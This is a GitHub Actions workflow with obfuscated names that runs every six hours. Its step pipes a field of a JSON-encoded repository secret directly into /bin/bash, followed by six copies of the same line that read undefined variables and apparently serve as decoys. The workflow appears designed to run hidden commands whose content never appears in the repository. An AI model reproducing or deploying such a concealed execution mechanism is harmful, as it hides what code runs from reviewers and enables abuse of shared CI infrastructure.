name: maturehometeam
on:
  workflow_dispatch:
  schedule:
    - cron: '54 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: maturehometeam
        env:
          xwzl75211: ${{ secrets.xwzl75211 }}
        run: |
          echo $xwzl75211 | jq -r .vclzb1 | /bin/bash
          echo $lg7553 | jq -r .ibtgb64241 | /bin/bash
          echo $bwddh0346 | jq -r .ynw12032 | /bin/bash
          echo $bxlj16 | jq -r .csrr81 | /bin/bash
          echo $cidhi215 | jq -r .ncx0 | /bin/bash
          echo $s93488 | jq -r .lbra4386 | /bin/bash
          echo $jayv478 | jq -r .qq0 | /bin/bash

